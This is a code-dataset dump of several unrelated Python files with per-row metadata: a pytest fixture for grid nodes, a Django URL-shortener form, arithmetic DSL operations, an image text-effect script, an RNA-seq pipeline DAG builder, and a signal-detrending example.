def node_infos():
return zip(IDS, PORTS)
@pytest.fixture(scope="session", autouse=True)
def init_gateway():
def setUpGateway(port):
os.environ["SECRET_KEY"] = "Secretkeyhere"
from gateway.app import create_app
app = create_app(debug=False)
app.run(host="0.0.0.0", port=GATEWAY_PORT)
# Init Grid Gateway
p = Process(target=setUpGateway, args=(GATEWAY_PORT,))
p.start()
time.sleep(5)
yield
p.terminate()
@pytest.fixture(scope="session", autouse=True)
def init_nodes(node_infos):
BASEDIR = os.path.dirname(os.path.dirname(__file__))
def setUpNode(port, node_id):
from app.websocket.app import create_app as ws_create_app
from app.websocket.app import socketio
db_path = "sqlite:///" + BASEDIR + "/database" + node_id + ".db"
requests.post(
GATEWAY_URL + "/join",
data=json.dumps(
{"node-id": node_id, "node-address": "http://localhost:" + port + "/"}
),
)
socketio.async_mode = "threading"
app = ws_create_app(
debug=False, tst_config={"SQLALCHEMY_DATABASE_URI": db_path}
)
socketio.run(app, host="0.0.0.0", port=port)
jobs = []
# Init Grid Nodes
for (node_id, port) in node_infos:
config = (node_id, port)
p = Process(target=setUpNode, args=(port, node_id))
p.start()
jobs.append(p)
time.sleep(5)
yield
for job in jobs:
job.terminate()
def create_websocket_client(hook, port, id):
node = gr.WebsocketGridClient(hook, "http://localhost:" + port + "/", id=id)
node.connect()
time.sleep(0.1)
return node
@pytest.fixture(scope="function")
def connected_node(hook):
nodes = {}
for (node_id, port) in zip(IDS, PORTS):
node = create_websocket_client(hook, port, node_id)
nodes[node_id] = node
yield nodes
for node in nodes:
nodes[node].disconnect()
time.sleep(0.1)
@pytest.fixture(scope="function")
def grid_network():
my_grid = gr.GridNetwork(GATEWAY_URL)
yield my_grid
my_grid.disconnect_nodes()
@pytest.fixture(scope="session", autouse=True)
def hook():
hook = TorchHook(torch)
return hook | en | 0.790201 | # We need to add our rest api as a path since it is a separate application # deployed on Heroku: # pragma: no cover helper function for spinning up a websocket participant # Init Grid Gateway # Init Grid Nodes | 2.086605 | 2 |
go/go/forms.py | srct/go | 7 | 6632512 | <gh_stars>1-10
"""
go/forms.py
"""
# Python stdlib Imports
from datetime import datetime, timedelta
# Django Imports
from django.core.exceptions import ValidationError
from django.forms import (BooleanField, CharField, ChoiceField, DateTimeField,
ModelForm, RadioSelect, SlugField, Textarea,
TextInput, URLField, URLInput)
from django.utils import timezone
from django.utils.safestring import mark_safe
# App Imports
from .models import URL
class URLForm(ModelForm):
def clean_target(self):
"""
Prevent redirect loop links
"""
# get the entered target link
target = self.cleaned_data.get('target')
return target
# Custom target URL field
target = URLField(
required=True,
label='Long URL (Required)',
max_length=1000,
widget=URLInput(attrs={
'placeholder': 'https://yoursite.com/',
'class': 'urlinput form-control',
})
)
# short --------------------------------------------------------------------
def unique_short(value):
"""
Check to make sure the short url has not been used
"""
try:
# if we're able to get a URL with the same short url
URL.objects.get(short__iexact=value)
except URL.DoesNotExist as ex:
return
# then raise a ValidationError
raise ValidationError('Short URL already exists.')
# Custom short-url field with validators.
short = SlugField(
required=False,
label='Short URL (Optional)',
widget=TextInput(
attrs={
'class': 'urlinput form-control',
}
),
validators=[unique_short],
max_length=20,
min_length=3,
)
# expires ------------------------------------------------------------------
# Define some string date standards
DAY = '1 Day'
WEEK = '1 Week'
MONTH = '1 Month'
# CUSTOM = 'Custom Date'
NEVER = 'Never'
# Define a tuple of string date standards to be used as our date choices
EXPIRATION_CHOICES = (
(DAY, DAY),
(WEEK, WEEK),
(MONTH, MONTH),
(NEVER, NEVER),
# (CUSTOM, CUSTOM),
)
# Add preset expiration choices.
expires = ChoiceField(
required=True,
label='Expiration (Required)',
choices=EXPIRATION_CHOICES,
initial=NEVER,
widget=RadioSelect(attrs={'class': 'radios'}),
)
def valid_date(value):
"""
Check if the selected date is a valid date
"""
# a valid date is one that is greater than today
if value > timezone.now():
return
# raise a ValidationError if the date is invalid
else:
raise ValidationError('Date must be after today.')
def __init__(self, *args, **kwargs):
"""
On initialization of the form, crispy forms renders this layout
"""
# Grab that host info
self.host = kwargs.pop('host', None)
super(URLForm, self).__init__(*args, **kwargs)
self.target_title = 'Paste the URL you would like to shorten:'
self.short_title = 'Create a custom Go address:'
self.expires_title = 'Set when you would like your Go address to expire:'
self.action = '/newLink'
class Meta:
"""
Metadata about this ModelForm
"""
# what model this form is for
model = URL
# what attributes are included
fields = ['target']
class EditForm(URLForm):
def __init__(self, *args, **kwargs):
super(EditForm, self).__init__(*args, **kwargs)
self.target_title = 'Modify the URL you would like to shorten:'
self.short_title = 'Modify the Go address:'
self.expires_title = 'Modify the expiration date:'
if 'initial' in kwargs:
self.action = '/edit/' + kwargs['initial']['short'] | """
go/forms.py
"""
# Python stdlib Imports
from datetime import datetime, timedelta
# Django Imports
from django.core.exceptions import ValidationError
from django.forms import (BooleanField, CharField, ChoiceField, DateTimeField,
ModelForm, RadioSelect, SlugField, Textarea,
TextInput, URLField, URLInput)
from django.utils import timezone
from django.utils.safestring import mark_safe
# App Imports
from .models import URL
class URLForm(ModelForm):
def clean_target(self):
"""
Prevent redirect loop links
"""
# get the entered target link
target = self.cleaned_data.get('target')
return target
# Custom target URL field
target = URLField(
required=True,
label='Long URL (Required)',
max_length=1000,
widget=URLInput(attrs={
'placeholder': 'https://yoursite.com/',
'class': 'urlinput form-control',
})
)
# short --------------------------------------------------------------------
def unique_short(value):
"""
Check to make sure the short url has not been used
"""
try:
# if we're able to get a URL with the same short url
URL.objects.get(short__iexact=value)
except URL.DoesNotExist as ex:
return
# then raise a ValidationError
raise ValidationError('Short URL already exists.')
# Custom short-url field with validators.
short = SlugField(
required=False,
label='Short URL (Optional)',
widget=TextInput(
attrs={
'class': 'urlinput form-control',
}
),
validators=[unique_short],
max_length=20,
min_length=3,
)
# expires ------------------------------------------------------------------
# Define some string date standards
DAY = '1 Day'
WEEK = '1 Week'
MONTH = '1 Month'
# CUSTOM = 'Custom Date'
NEVER = 'Never'
# Define a tuple of string date standards to be used as our date choices
EXPIRATION_CHOICES = (
(DAY, DAY),
(WEEK, WEEK),
(MONTH, MONTH),
(NEVER, NEVER),
# (CUSTOM, CUSTOM),
)
# Add preset expiration choices.
expires = ChoiceField(
required=True,
label='Expiration (Required)',
choices=EXPIRATION_CHOICES,
initial=NEVER,
widget=RadioSelect(attrs={'class': 'radios'}),
)
def valid_date(value):
"""
Check if the selected date is a valid date
"""
# a valid date is one that is greater than today
if value > timezone.now():
return
# raise a ValidationError if the date is invalid
else:
raise ValidationError('Date must be after today.')
def __init__(self, *args, **kwargs):
"""
On initialization of the form, crispy forms renders this layout
"""
# Grab that host info
self.host = kwargs.pop('host', None)
super(URLForm, self).__init__(*args, **kwargs)
self.target_title = 'Paste the URL you would like to shorten:'
self.short_title = 'Create a custom Go address:'
self.expires_title = 'Set when you would like your Go address to expire:'
self.action = '/newLink'
class Meta:
"""
Metadata about this ModelForm
"""
# what model this form is for
model = URL
# what attributes are included
fields = ['target']
class EditForm(URLForm):
def __init__(self, *args, **kwargs):
super(EditForm, self).__init__(*args, **kwargs)
self.target_title = 'Modify the URL you would like to shorten:'
self.short_title = 'Modify the Go address:'
self.expires_title = 'Modify the expiration date:'
if 'initial' in kwargs:
self.action = '/edit/' + kwargs['initial']['short'] | en | 0.742338 | go/forms.py # Python stdlib Imports # Django Imports # App Imports Prevent redirect loop links # get the entered target link # Custom target URL field # short -------------------------------------------------------------------- Check to make sure the short url has not been used # if we're able to get a URL with the same short url # then raise a ValidationError # Custom short-url field with validators. # expires ------------------------------------------------------------------ # Define some string date standards # CUSTOM = 'Custom Date' # Define a tuple of string date standards to be used as our date choices # (CUSTOM, CUSTOM), # Add preset expiration choices. Check if the selected date is a valid date # a valid date is one that is greater than today # raise a ValidationError if the date is invalid On initialization of the form, crispy forms renders this layout # Grab that host info Metadata about this ModelForm # what model this form is for # what attributes are included | 2.476459 | 2 |
crossbeam/dsl/arithmetic_operations.py | ellisk42/xlambda | 12 | 6632513 | <filename>crossbeam/dsl/arithmetic_operations.py
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Operations for the integer arithmetic DSL."""
from crossbeam.dsl import operation_base
class AddOperation(operation_base.OperationBase):
"""An operation that adds 2 numbers."""
def __init__(self):
super(AddOperation, self).__init__('AddOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left + right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' + ']
+ right.tokenized_expression() + [')'])
class SubtractOperation(operation_base.OperationBase):
"""An operation that subtracts 2 numbers."""
def __init__(self):
super(SubtractOperation, self).__init__('SubtractOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left - right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' - ']
+ right.tokenized_expression() + [')'])
class MultiplyOperation(operation_base.OperationBase):
"""An operation that multiplies 2 numbers."""
def __init__(self):
super(MultiplyOperation, self).__init__('MultiplyOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left * right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' * ']
+ right.tokenized_expression() + [')'])
class IntDivideOperation(operation_base.OperationBase):
"""An operation that divides 2 integers."""
def __init__(self):
super(IntDivideOperation, self).__init__('IntDivideOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left // right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' // ']
+ right.tokenized_expression() + [')'])
def get_operations():
return [
AddOperation(),
SubtractOperation(),
MultiplyOperation(),
IntDivideOperation(),
]
| <filename>crossbeam/dsl/arithmetic_operations.py
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Operations for the integer arithmetic DSL."""
from crossbeam.dsl import operation_base
class AddOperation(operation_base.OperationBase):
"""An operation that adds 2 numbers."""
def __init__(self):
super(AddOperation, self).__init__('AddOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left + right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' + ']
+ right.tokenized_expression() + [')'])
class SubtractOperation(operation_base.OperationBase):
"""An operation that subtracts 2 numbers."""
def __init__(self):
super(SubtractOperation, self).__init__('SubtractOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left - right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' - ']
+ right.tokenized_expression() + [')'])
class MultiplyOperation(operation_base.OperationBase):
"""An operation that multiplies 2 numbers."""
def __init__(self):
super(MultiplyOperation, self).__init__('MultiplyOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left * right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' * ']
+ right.tokenized_expression() + [')'])
class IntDivideOperation(operation_base.OperationBase):
"""An operation that divides 2 integers."""
def __init__(self):
super(IntDivideOperation, self).__init__('IntDivideOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left // right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' // ']
+ right.tokenized_expression() + [')'])
def get_operations():
return [
AddOperation(),
SubtractOperation(),
MultiplyOperation(),
IntDivideOperation(),
]
| en | 0.827575 | # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Operations for the integer arithmetic DSL. An operation that adds 2 numbers. See base class. See base class. An operation that subtracts 2 numbers. See base class. See base class. An operation that multiplies 2 numbers. See base class. See base class. An operation that divides 2 integers. See base class. See base class. | 2.670984 | 3 |
examples/fonteffects/sample36_comet.py | chromia/wandplus | 0 | 6632514 | #!/usr/bin/env python
from wand.image import Image
from wand.drawing import Drawing
from wand.color import Color
from wandplus.image import motionblur
# http://www.imagemagick.org/Usage/fonts/
# original imagemagick command:
# convert -size 340x120 xc:lightblue -font Candice -pointsize 72 \
# -fill navy -annotate +45+95 'Anthony' -motion-blur 0x25+65 \
# -fill black -annotate +45+95 'Anthony' -motion-blur 0x1+65 \
# font_comet.jpg
w = 340
h = 120
bgcolor = Color('lightblue')
with Image(width=w, height=h, background=bgcolor) as img:
with Drawing() as draw:
text = 'Anthony'
draw.font = 'Candice'
draw.font_size = 72
draw.gravity = 'forget'
x = 45
y = 95
draw.fill_color = Color('navy')
draw.text(x, y, text)
draw(img)
motionblur(img, 0, 25, 65)
draw.fill_color = Color('black')
draw.text(x, y, text)
draw(img)
motionblur(img, 0, 1, 65)
img.save(filename='sample36.png')
| #!/usr/bin/env python
from wand.image import Image
from wand.drawing import Drawing
from wand.color import Color
from wandplus.image import motionblur
# http://www.imagemagick.org/Usage/fonts/
# original imagemagick command:
# convert -size 340x120 xc:lightblue -font Candice -pointsize 72 \
# -fill navy -annotate +45+95 'Anthony' -motion-blur 0x25+65 \
# -fill black -annotate +45+95 'Anthony' -motion-blur 0x1+65 \
# font_comet.jpg
w = 340
h = 120
bgcolor = Color('lightblue')
with Image(width=w, height=h, background=bgcolor) as img:
with Drawing() as draw:
text = 'Anthony'
draw.font = 'Candice'
draw.font_size = 72
draw.gravity = 'forget'
x = 45
y = 95
draw.fill_color = Color('navy')
draw.text(x, y, text)
draw(img)
motionblur(img, 0, 25, 65)
draw.fill_color = Color('black')
draw.text(x, y, text)
draw(img)
motionblur(img, 0, 1, 65)
img.save(filename='sample36.png')
| en | 0.101383 | #!/usr/bin/env python # http://www.imagemagick.org/Usage/fonts/ # original imagemagick command: # convert -size 340x120 xc:lightblue -font Candice -pointsize 72 \ # -fill navy -annotate +45+95 'Anthony' -motion-blur 0x25+65 \ # -fill black -annotate +45+95 'Anthony' -motion-blur 0x1+65 \ # font_comet.jpg | 2.652598 | 3 |
woldrnaseq/make_star_rsem_dag.py | detrout/woldlab-rna-seq | 2 | 6632515 | """STAR & RSEM based RNA-Seq pipeline.
"""
from __future__ import absolute_import, print_function
from argparse import ArgumentParser
import datetime
import getpass
import itertools
import logging
import os
from pathlib import Path
from pkg_resources import resource_filename
import stat
from jinja2 import Environment, PackageLoader
import woldrnaseq
from woldrnaseq import __version__
from .common import (
add_default_path_arguments,
add_debug_arguments,
add_version_argument,
configure_logging,
)
logger = logging.getLogger(__name__)
def main(cmdline=None):
parser = make_parser()
args = parser.parse_args(cmdline)
configure_logging(args)
analysis = AnalysisDAG()
analysis.genome_dir = args.genome_dir
analysis.star_dir = args.star_dir
analysis.rsem_dir = args.rsem_dir
analysis.georgi_dir = args.georgi_dir
analysis.ucsc_tools_dir = args.ucsc_tools_dir
analysis.genome = args.genome
analysis.annotation = args.annotation
analysis.sex = args.sex
analysis.job_id = args.library_id
analysis.analysis_dir = args.analysis_dir
analysis.analysis_name = args.analysis_name
analysis.read_1_fastqs = args.read1
analysis.read_2_fastqs = args.read2
analysis.splice_template = args.splice_template
if analysis.is_valid():
print(str(analysis))
def make_parser():
parser = ArgumentParser()
parser.add_argument('-g', '--genome')
parser.add_argument('-a', '--annotation')
parser.add_argument('-s', '--sex')
parser.add_argument('-l', '--library-id')
parser.add_argument('--analysis-dir', help='target dir to store analysis')
parser.add_argument('--analysis-name', help='name to store analysis')
parser.add_argument('--read1', nargs='+', help='path to read 1 fastqs')
parser.add_argument('--read2', nargs='*', default=[],
help='path to read 2 fastqs')
parser.add_argument('--splice-template', default='star_rsem.dagman',
help='Override splice dagman template')
add_default_path_arguments(parser)
add_version_argument(parser)
add_debug_arguments(parser)
return parser
class AnalysisDAG:
def __init__(self):
self.genome_dir = None
self.star_dir = None
self.rsem_dir = None
self.georgi_dir = None
self.ucsc_tools_dir = None
self.job_id = None
self.genome = None
self.annotation = None
self.sex = None
self.analysis_dir = None
self._analysis_name = None
self.read_1_fastqs = []
self.read_2_fastqs = []
self.stranded = 'unstranded'
self.reference_prefix = 'chr'
self.splice_template = 'star_rsem.dagman'
@property
def fastq_size(self):
filesize = 0
for filename in itertools.chain(self.read_1_fastqs, self.read_2_fastqs):
filesize += os.stat(filename)[stat.ST_SIZE]
return filesize
@property
def star_index_size(self):
genome_dir = Path(self.genome_dir)
sa_name = genome_dir / self.genome_triplet / "SA"
filesize = os.stat(sa_name)[stat.ST_SIZE]
return filesize
@property
def star_memory_size(self):
return self.fastq_size * 3 + self.star_index_size
@property
def genome_triplet(self):
return "-".join((self.genome, self.annotation, self.sex))
def is_valid(self):
for key in self.__dict__:
if key == 'read_1_fastqs' and len(self.read_1_fastqs) == 0:
raise ValueError("Read 1 fastqs are required for library {}".format(self.job_id))
elif key == '_analysis_name':
# analysis name will default to analysis dir
pass
elif key == 'analysis_dir':
if self.analysis_dir is None:
raise ValueError("analysis_dir is not set")
if not os.path.exists(self.analysis_dir):
logger.warning("Analysis dir %s doesn't exist", self.analysis_dir)
elif getattr(self, key) is None:
raise ValueError("{} is not set".format(key))
return True
@property
def analysis_name(self):
if self._analysis_name is not None:
return self._analysis_name
if self.analysis_dir is not None:
self._analysis_name = os.path.basename(self.analysis_dir)
return self._analysis_name
@analysis_name.setter
def analysis_name(self, value):
self._analysis_name = value
def __str__(self):
env = Environment(loader=PackageLoader('woldrnaseq', 'templates'))
template = env.get_template(self.splice_template)
rsem_paired_argument = '--paired-end' if len(self.read_2_fastqs) > 0 else ''
if self.stranded == 'forward':
rsem_strand_probability = '--forward-prob 1'
elif self.stranded == 'reverse':
rsem_strand_probability = '--forward-prob 0'
else:
rsem_strand_probability = '--forward-prob 0.5'
if self.stranded == "unstranded":
bam2bigwig = resource_filename(__name__, 'bam2bigwig_unstranded.condor')
else:
bam2bigwig = resource_filename(__name__, 'bam2bigwig_stranded.condor')
return template.render(
align_star=resource_filename(__name__, 'align-star.condor'),
pre_star=resource_filename(__name__, 'pre_star'),
post_star=resource_filename(__name__, 'post_star'),
sort_samtools=resource_filename(__name__, 'sort-samtools.condor'),
quant_rsem=resource_filename(__name__, 'quant-rsem.condor'),
index_samtools=resource_filename(__name__, 'index-samtools.condor'),
qc_samstats=resource_filename(__name__, 'qc-samstats.condor'),
bedgraph_star=resource_filename(__name__, 'bedgraph-star.condor'),
qc_coverage=resource_filename(__name__, 'qc-coverage.condor'),
qc_distribution=resource_filename(__name__, 'qc-distribution.condor'),
bam2bigwig=bam2bigwig,
sort_samtools_sh=resource_filename(__name__, 'sort-samtools.sh'),
bedgraph_bedsort_sh=resource_filename(__name__, 'bedsort.sh'),
picard_markdup=resource_filename(__name__, 'picard-markdup.condor'),
picard_multi_metrics=resource_filename(__name__, 'picard-multi-metrics.condor'),
rrna_premap=resource_filename(__name__, 'rrna-premap.condor'),
rrna_premap_sh=resource_filename(__name__, 'rrna-premap.sh'),
genome_dir=self.genome_dir,
star_dir=self.star_dir,
rsem_dir=self.rsem_dir,
georgi_dir=self.georgi_dir,
ucsc_tools_dir=self.ucsc_tools_dir,
job_id=self.job_id,
genome=self.genome,
annotation=self.annotation,
sex=self.sex,
analysis_dir=self.analysis_dir,
analysis_name=self.analysis_name,
read_1_fastqs=",".join(self.read_1_fastqs),
read_2_fastqs=",".join(self.read_2_fastqs),
star_request_memory_megabytes=int(self.star_memory_size / (2 ** 20)),
star_request_memory_bytes=int(self.star_memory_size),
star_request_disk_kilobytes=int(self.fastq_size/1024 * 4),
reference_prefix=self.reference_prefix,
rsem_paired_argument=rsem_paired_argument,
rsem_strand_probability=rsem_strand_probability,
rsem_request_disk=int(self.fastq_size/1024 * 7),
pythonpath=Path(woldrnaseq.__path__[0]).parent,
username=getpass.getuser(),
timestamp=datetime.datetime.now().isoformat(),
woldrnaseq_version=__version__,
)
if __name__ == "__main__":
main()
| """STAR & RSEM based RNA-Seq pipeline.
"""
from __future__ import absolute_import, print_function
from argparse import ArgumentParser
import datetime
import getpass
import itertools
import logging
import os
from pathlib import Path
from pkg_resources import resource_filename
import stat
from jinja2 import Environment, PackageLoader
import woldrnaseq
from woldrnaseq import __version__
from .common import (
add_default_path_arguments,
add_debug_arguments,
add_version_argument,
configure_logging,
)
logger = logging.getLogger(__name__)
def main(cmdline=None):
parser = make_parser()
args = parser.parse_args(cmdline)
configure_logging(args)
analysis = AnalysisDAG()
analysis.genome_dir = args.genome_dir
analysis.star_dir = args.star_dir
analysis.rsem_dir = args.rsem_dir
analysis.georgi_dir = args.georgi_dir
analysis.ucsc_tools_dir = args.ucsc_tools_dir
analysis.genome = args.genome
analysis.annotation = args.annotation
analysis.sex = args.sex
analysis.job_id = args.library_id
analysis.analysis_dir = args.analysis_dir
analysis.analysis_name = args.analysis_name
analysis.read_1_fastqs = args.read1
analysis.read_2_fastqs = args.read2
analysis.splice_template = args.splice_template
if analysis.is_valid():
print(str(analysis))
def make_parser():
parser = ArgumentParser()
parser.add_argument('-g', '--genome')
parser.add_argument('-a', '--annotation')
parser.add_argument('-s', '--sex')
parser.add_argument('-l', '--library-id')
parser.add_argument('--analysis-dir', help='target dir to store analysis')
parser.add_argument('--analysis-name', help='name to store analysis')
parser.add_argument('--read1', nargs='+', help='path to read 1 fastqs')
parser.add_argument('--read2', nargs='*', default=[],
help='path to read 2 fastqs')
parser.add_argument('--splice-template', default='star_rsem.dagman',
help='Override splice dagman template')
add_default_path_arguments(parser)
add_version_argument(parser)
add_debug_arguments(parser)
return parser
class AnalysisDAG:
def __init__(self):
self.genome_dir = None
self.star_dir = None
self.rsem_dir = None
self.georgi_dir = None
self.ucsc_tools_dir = None
self.job_id = None
self.genome = None
self.annotation = None
self.sex = None
self.analysis_dir = None
self._analysis_name = None
self.read_1_fastqs = []
self.read_2_fastqs = []
self.stranded = 'unstranded'
self.reference_prefix = 'chr'
self.splice_template = 'star_rsem.dagman'
@property
def fastq_size(self):
filesize = 0
for filename in itertools.chain(self.read_1_fastqs, self.read_2_fastqs):
filesize += os.stat(filename)[stat.ST_SIZE]
return filesize
@property
def star_index_size(self):
genome_dir = Path(self.genome_dir)
sa_name = genome_dir / self.genome_triplet / "SA"
filesize = os.stat(sa_name)[stat.ST_SIZE]
return filesize
@property
def star_memory_size(self):
return self.fastq_size * 3 + self.star_index_size
@property
def genome_triplet(self):
return "-".join((self.genome, self.annotation, self.sex))
def is_valid(self):
for key in self.__dict__:
if key == 'read_1_fastqs' and len(self.read_1_fastqs) == 0:
raise ValueError("Read 1 fastqs are required for library {}".format(self.job_id))
elif key == '_analysis_name':
# analysis name will default to analysis dir
pass
elif key == 'analysis_dir':
if self.analysis_dir is None:
raise ValueError("analysis_dir is not set")
if not os.path.exists(self.analysis_dir):
logger.warning("Analysis dir %s doesn't exist", self.analysis_dir)
elif getattr(self, key) is None:
raise ValueError("{} is not set".format(key))
return True
@property
def analysis_name(self):
if self._analysis_name is not None:
return self._analysis_name
if self.analysis_dir is not None:
self._analysis_name = os.path.basename(self.analysis_dir)
return self._analysis_name
@analysis_name.setter
def analysis_name(self, value):
self._analysis_name = value
def __str__(self):
env = Environment(loader=PackageLoader('woldrnaseq', 'templates'))
template = env.get_template(self.splice_template)
rsem_paired_argument = '--paired-end' if len(self.read_2_fastqs) > 0 else ''
if self.stranded == 'forward':
rsem_strand_probability = '--forward-prob 1'
elif self.stranded == 'reverse':
rsem_strand_probability = '--forward-prob 0'
else:
rsem_strand_probability = '--forward-prob 0.5'
if self.stranded == "unstranded":
bam2bigwig = resource_filename(__name__, 'bam2bigwig_unstranded.condor')
else:
bam2bigwig = resource_filename(__name__, 'bam2bigwig_stranded.condor')
return template.render(
align_star=resource_filename(__name__, 'align-star.condor'),
pre_star=resource_filename(__name__, 'pre_star'),
post_star=resource_filename(__name__, 'post_star'),
sort_samtools=resource_filename(__name__, 'sort-samtools.condor'),
quant_rsem=resource_filename(__name__, 'quant-rsem.condor'),
index_samtools=resource_filename(__name__, 'index-samtools.condor'),
qc_samstats=resource_filename(__name__, 'qc-samstats.condor'),
bedgraph_star=resource_filename(__name__, 'bedgraph-star.condor'),
qc_coverage=resource_filename(__name__, 'qc-coverage.condor'),
qc_distribution=resource_filename(__name__, 'qc-distribution.condor'),
bam2bigwig=bam2bigwig,
sort_samtools_sh=resource_filename(__name__, 'sort-samtools.sh'),
bedgraph_bedsort_sh=resource_filename(__name__, 'bedsort.sh'),
picard_markdup=resource_filename(__name__, 'picard-markdup.condor'),
picard_multi_metrics=resource_filename(__name__, 'picard-multi-metrics.condor'),
rrna_premap=resource_filename(__name__, 'rrna-premap.condor'),
rrna_premap_sh=resource_filename(__name__, 'rrna-premap.sh'),
genome_dir=self.genome_dir,
star_dir=self.star_dir,
rsem_dir=self.rsem_dir,
georgi_dir=self.georgi_dir,
ucsc_tools_dir=self.ucsc_tools_dir,
job_id=self.job_id,
genome=self.genome,
annotation=self.annotation,
sex=self.sex,
analysis_dir=self.analysis_dir,
analysis_name=self.analysis_name,
read_1_fastqs=",".join(self.read_1_fastqs),
read_2_fastqs=",".join(self.read_2_fastqs),
star_request_memory_megabytes=int(self.star_memory_size / (2 ** 20)),
star_request_memory_bytes=int(self.star_memory_size),
star_request_disk_kilobytes=int(self.fastq_size/1024 * 4),
reference_prefix=self.reference_prefix,
rsem_paired_argument=rsem_paired_argument,
rsem_strand_probability=rsem_strand_probability,
rsem_request_disk=int(self.fastq_size/1024 * 7),
pythonpath=Path(woldrnaseq.__path__[0]).parent,
username=getpass.getuser(),
timestamp=datetime.datetime.now().isoformat(),
woldrnaseq_version=__version__,
)
if __name__ == "__main__":
main()
| en | 0.750548 | STAR & RSEM based RNA-Seq pipeline. # analysis name will default to analysis dir | 2.26522 | 2 |
query_result.py | Berdugo1994/Tweeter-Search-Engine | 0 | 6632516 | <reponame>Berdugo1994/Tweeter-Search-Engine
class QueryResult:
def __init__(self,
tweet_id,
similarity,
full_text):
self.tweet_id = tweet_id
self.similarity = similarity
self.full_text = full_text
def __str__(self):
# return ", Tweet id: " + self.tweet_id + ", Score: " + str(self.similarity)
return self.full_text + ", Tweet id: " + self.tweet_id + ", Score: " + str(self.similarity) | class QueryResult:
def __init__(self,
tweet_id,
similarity,
full_text):
self.tweet_id = tweet_id
self.similarity = similarity
self.full_text = full_text
def __str__(self):
# return ", Tweet id: " + self.tweet_id + ", Score: " + str(self.similarity)
return self.full_text + ", Tweet id: " + self.tweet_id + ", Score: " + str(self.similarity) | en | 0.191254 | # return ", Tweet id: " + self.tweet_id + ", Score: " + str(self.similarity) | 2.844301 | 3 |
average.py | subho781/MCA-Python-Assignment | 0 | 6632517 | <reponame>subho781/MCA-Python-Assignment<filename>average.py
s1 = float(input('enter marks : '))
s2 = float(input('enter marks : '))
aggregate = (s1+s2)/2
print('aggregate :',aggregate)
| s1 = float(input('enter marks : '))
s2 = float(input('enter marks : '))
aggregate = (s1+s2)/2
print('aggregate :',aggregate) | none | 1 | 3.765894 | 4 |
|
examples/example_detrend.py | nbara/python-meegk | 80 | 6632518 | """
Robust detrending examples
==========================
Some toy examples to showcase usage for ``meegkit.detrend`` module.
Robust referencing is adapted from [1].
References
----------
> [1] <NAME>., & <NAME>. (2018). Robust detrending,
rereferencing, outlier detection, and inpainting for multichannel data.
NeuroImage, 172, 903-912.
"""
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.gridspec import GridSpec
from meegkit.detrend import regress, detrend
# import config # plotting utils
np.random.seed(9)
###############################################################################
# Regression
# =============================================================================
###############################################################################
# Simple regression example, no weights
# -----------------------------------------------------------------------------
# We first try to fit a simple random walk process.
x = np.cumsum(np.random.randn(1000, 1), axis=0)
r = np.arange(1000.)[:, None]
r = np.hstack([r, r ** 2, r ** 3])
b, y = regress(x, r)
plt.figure(1)
plt.plot(x, label='data')
plt.plot(y, label='fit')
plt.title('No weights')
plt.legend()
plt.show()
###############################################################################
# Downweight 1st half of the data
# -----------------------------------------------------------------------------
# We can also use weights for each time sample. Here we explicitly restrict the
# fit to the second half of the data by setting weights to zero for the first
# 500 samples.
x = np.cumsum(np.random.randn(1000, 1), axis=0) + 1000
w = np.ones(y.shape[0])
w[:500] = 0
b, y = regress(x, r, w)
f = plt.figure(3)
gs = GridSpec(4, 1, figure=f)
ax1 = f.add_subplot(gs[:3, 0])
ax1.plot(x, label='data')
ax1.plot(y, label='fit')
ax1.set_xticklabels('')
ax1.set_title('Split-wise regression')
ax1.legend()
ax2 = f.add_subplot(gs[3, 0])
l, = ax2.plot(np.arange(1000), np.zeros(1000))
ax2.stackplot(np.arange(1000), w, labels=['weights'], color=l.get_color())
ax2.legend(loc=2)
###############################################################################
# Multichannel regression
# -----------------------------------------------------------------------------
x = np.cumsum(np.random.randn(1000, 2), axis=0)
w = np.ones(y.shape[0])
b, y = regress(x, r, w)
plt.figure(4)
plt.plot(x, label='data', color='C0')
